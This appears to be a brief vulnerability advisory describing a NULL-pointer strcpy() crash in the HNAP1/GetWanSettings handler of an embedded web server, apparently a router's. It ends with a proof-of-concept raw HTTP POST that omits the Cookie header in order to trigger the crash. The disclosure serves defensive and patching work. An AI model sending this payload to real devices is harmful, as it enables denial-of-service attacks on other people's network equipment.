The function sub_4484A8() is used to manage HNAP1/GetWanSettings. It calls sub_45B5B8() to perform an authentication-related operation, and then passes the return value(v98) to strcpy(). However, when HTTP headers do not contain a Cookie, sub_45B5B8() returns a NULL pointer. Passing a NULL pointer to strcpy() will unexpectedly crash the server.
This allows an authorized attacker to perform a DoS attack.
b'POST /HNAP1/ HTTP/1.1\\r\\nContent-Length: 303\\r\\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\\r\\nSOAPAction: "<http://purenetworks.com/HNAP1/GetWanSettings>"\\r\\n\\r\\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:soap="<http://schemas.xmlsoap.org/soap/envelope/>"><soap:Body><GetWanSettings xmlns="<http://purenetworks.com/HNAP1/>" /></soap:Body></soap:Envelope>\\r\\n'
